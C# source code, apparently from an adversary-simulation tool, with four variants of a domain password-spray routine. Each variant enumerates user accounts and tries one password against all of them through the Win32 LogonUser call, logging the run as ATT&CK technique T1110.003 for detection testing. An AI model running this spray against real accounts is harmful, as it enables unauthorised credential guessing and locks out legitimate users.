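/// <summary>
/// Console variant of the password-spray simulation: submits one logon attempt per
/// target account, all with the same password, and reports progress on standard output.
/// </summary>
/// <param name="usertype">Target-selection mode forwarded to <c>Lib.Targets.GetUserTargets</c>. The value 7 switches the logon domain to "." (presumably local machine accounts; confirm against GetUserTargets).</param>
/// <param name="nuser">Forwarded to <c>GetUserTargets</c>; presumably the number of accounts to select.</param>
/// <param name="protocol">1 selects the Kerberos path, 2 the non-Kerberos path. Any other value aborts the run before accounts are enumerated.</param>
/// <param name="sleep">Seconds to pause after each attempt; zero or a negative value disables the pause.</param>
/// <param name="password">Password submitted for every target account.</param>
public static void LocalDomainPasswordSpray(int usertype, int nuser, int protocol, int sleep, string password)
{
    // Reject an unknown protocol selector up front. Previously the account list was
    // fetched first and the method then returned without any message, so a
    // misconfigured run still queried for targets and left the operator with no output.
    if (protocol != 1 && protocol != 2)
    {
        Console.WriteLine("[!] Unsupported protocol value {0}; expected 1 or 2", protocol);
        return;
    }

    // NOTE(review): the last two LogonUser arguments look like the Win32 dwLogonType
    // (2 = interactive) and dwLogonProvider (0 = default, 2 = WINNT40) values;
    // confirm against CredAccessHelper.LogonUser.
    int logonProvider = protocol == 1 ? 0 : 2;

    List<User> usertargets = Lib.Targets.GetUserTargets(usertype, nuser);
    Console.WriteLine("[*] Obtained {0} user accounts", usertargets.Count);

    string domain = System.Net.NetworkInformation.IPGlobalProperties.GetIPGlobalProperties().DomainName;
    if (usertype == 7)
    {
        domain = ".";
    }

    Console.WriteLine("[*] Starting Domain Password Spray Attack on {0}", Environment.MachineName);
    if (sleep > 0)
    {
        Console.WriteLine("[*] Sleeping {0} seconds between attempt", sleep);
    }

    // NOTE(review): every iteration is a live authentication attempt against a real
    // account, so failures presumably count toward the account lockout threshold.
    // The optional pause below is the only throttle in this method.
    foreach (var user in usertargets)
    {
        CredAccessHelper.LogonUser(user.UserName, domain, password, 2, logonProvider);
        if (sleep > 0)
        {
            Thread.Sleep(sleep * 1000);
        }
    }
}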
/// <summary>
/// Playbook-driven variant of the password-spray simulation. Writes a T1110.003 record to
/// the log file and submits one logon attempt per target account using the playbook's
/// spray password.
/// </summary>
/// <param name="playbook_task">Supplies the protocol name, target selection, spray password and per-attempt pause (seconds).</param>
/// <param name="log">Log file name, appended to the application base directory.</param>
public static void LocalDomainPasswordSpray(PlaybookTask playbook_task, string log)
{
    string baseDir = AppDomain.CurrentDomain.BaseDirectory;
    Lib.Logger logger = new Logger(baseDir + log);

    logger.SimulationHeader("T1110.003");
    logger.TimestampInfo("Local Domain Brute Force using the LogonUser Win32 API function");
    logger.TimestampInfo(String.Format("Using {0}", playbook_task.protocol));

    try
    {
        List<User> targets = Targets.GetUserTargets(playbook_task, logger);

        if (playbook_task.task_sleep > 0)
        {
            logger.TimestampInfo(String.Format("Sleeping {0} seconds between attempt", playbook_task.task_sleep));
        }

        // This overload always authenticates against the machine's DNS domain. The
        // local-account override (domain ".") for user_target_type 6 is disabled here.
        String domain = System.Net.NetworkInformation.IPGlobalProperties.GetIPGlobalProperties().DomainName;

        foreach (var target in targets)
        {
            // Any protocol string other than "KERBEROS" (case-insensitive) takes the
            // provider-2 path. A null protocol throws here and is reported through
            // SimulationFailed by the catch block.
            // NOTE(review): the 4th and 5th arguments look like the Win32 dwLogonType
            // and dwLogonProvider values; confirm against CredAccessHelper.LogonUser.
            bool isKerberos = playbook_task.protocol.ToUpper().Equals("KERBEROS");
            int logonProvider = isKerberos ? 0 : 2;

            CredAccessHelper.LogonUser(target.UserName, domain, playbook_task.spray_password, 2, logonProvider, logger);

            // NOTE(review): this pause is the only throttle between live authentication
            // attempts; failures presumably count toward account lockout.
            if (playbook_task.task_sleep > 0)
            {
                Thread.Sleep(playbook_task.task_sleep * 1000);
            }
        }

        logger.SimulationFinished();
    }
    catch (Exception ex)
    {
        logger.SimulationFailed(ex);
    }
}
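/// <summary>
/// Logging variant of the password-spray simulation with explicit target type and protocol.
/// Writes a T1110 record to the log file and submits one logon attempt per target account.
/// </summary>
/// <param name="usertype">Target-selection mode forwarded to <c>Lib.Targets.GetUserTargets</c>. The value 7 switches the logon domain to "." (presumably local machine accounts; confirm against GetUserTargets).</param>
/// <param name="nuser">Forwarded to <c>GetUserTargets</c>; presumably the number of accounts to select.</param>
/// <param name="protocol">1 selects the Kerberos path, 2 the non-Kerberos path. Any other value is logged as a failed simulation.</param>
/// <param name="sleep">Seconds to pause after each attempt; zero or a negative value disables the pause.</param>
/// <param name="password">Password submitted for every target account.</param>
/// <param name="log">Log file name, appended to the application base directory.</param>
public static void LocalDomainPasswordSpray(int usertype, int nuser, int protocol, int sleep, string password, string log)
{
    string currentPath = AppDomain.CurrentDomain.BaseDirectory;
    Lib.Logger logger = new Lib.Logger(currentPath + log);

    // NOTE(review): the other logging overloads record the sub-technique "T1110.003";
    // this one records the parent technique. Confirm which ID the log consumers
    // expect before changing it.
    logger.SimulationHeader("T1110");
    logger.TimestampInfo(String.Format("Local Domain Brute Force"));

    try
    {
        // Validate before enumerating targets. Previously an unknown protocol returned
        // silently after the header was written, leaving a log entry with neither a
        // finished nor a failed marker. Throwing here sends it through SimulationFailed.
        if (protocol != 1 && protocol != 2)
        {
            throw new ArgumentOutOfRangeException(nameof(protocol), protocol, "protocol must be 1 or 2");
        }

        // NOTE(review): the 4th and 5th LogonUser arguments look like the Win32
        // dwLogonType (2 = interactive) and dwLogonProvider (0 = default, 2 = WINNT40)
        // values; confirm against CredAccessHelper.LogonUser.
        int logonProvider = protocol == 1 ? 0 : 2;

        List<User> usertargets = Lib.Targets.GetUserTargets(usertype, nuser);
        logger.TimestampInfo(String.Format("Obtained {0} user accounts", usertargets.Count));

        String domain = System.Net.NetworkInformation.IPGlobalProperties.GetIPGlobalProperties().DomainName;
        if (usertype == 7)
        {
            domain = ".";
        }

        // NOTE(review): every iteration is a live authentication attempt, so failures
        // presumably count toward account lockout. The optional pause is the only
        // throttle in this method.
        foreach (var user in usertargets)
        {
            CredAccessHelper.LogonUser(user.UserName, domain, password, 2, logonProvider, logger);
            if (sleep > 0)
            {
                Thread.Sleep(sleep * 1000);
            }
        }

        logger.SimulationFinished();
    }
    catch (Exception ex)
    {
        logger.SimulationFailed(ex);
    }
}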
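/// <summary>
/// Simplified logging variant of the password-spray simulation. Target type and protocol
/// are fixed inside the method; writes a T1110.003 record to the log file and submits one
/// logon attempt per target account.
/// </summary>
/// <param name="nuser">Forwarded to <c>Lib.Targets.GetUserTargets</c>; presumably the number of accounts to select.</param>
/// <param name="sleep">Seconds to pause after each attempt; zero or a negative value disables the pause.</param>
/// <param name="password">Password submitted for every target account.</param>
/// <param name="log">Log file name, appended to the application base directory.</param>
public static void LocalDomainPasswordSpray(int nuser, int sleep, string password, string log)
{
    // Target type and logon provider are pinned. The randomised selection that once
    // chose them is disabled, so the unused Random instance, the constant switch and
    // the never-taken "usertype == 6" local-domain override have been removed.
    const int usertype = 1;
    // NOTE(review): 2 looks like the Win32 dwLogonProvider value WINNT40 (the
    // non-Kerberos path); confirm against CredAccessHelper.LogonUser.
    const int logonProvider = 2;

    string currentPath = AppDomain.CurrentDomain.BaseDirectory;
    Lib.Logger logger = new Lib.Logger(currentPath + log);
    logger.SimulationHeader("T1110.003");
    logger.TimestampInfo(String.Format("Local Domain Brute Force using the LogonUser Win32 API function"));

    try
    {
        List<User> usertargets = Lib.Targets.GetUserTargets(usertype, nuser, logger);
        logger.TimestampInfo(String.Format("Obtained {0} user accounts", usertargets.Count));

        if (sleep > 0)
        {
            logger.TimestampInfo(String.Format("Sleeping {0} seconds between attempt", sleep));
        }

        String domain = System.Net.NetworkInformation.IPGlobalProperties.GetIPGlobalProperties().DomainName;

        // NOTE(review): every iteration is a live authentication attempt, so failures
        // presumably count toward account lockout. The optional pause is the only
        // throttle in this method.
        foreach (var user in usertargets)
        {
            CredAccessHelper.LogonUser(user.UserName, domain, password, 2, logonProvider, logger);
            if (sleep > 0)
            {
                Thread.Sleep(sleep * 1000);
            }
        }

        logger.SimulationFinished();
    }
    catch (Exception ex)
    {
        logger.SimulationFailed(ex);
    }
}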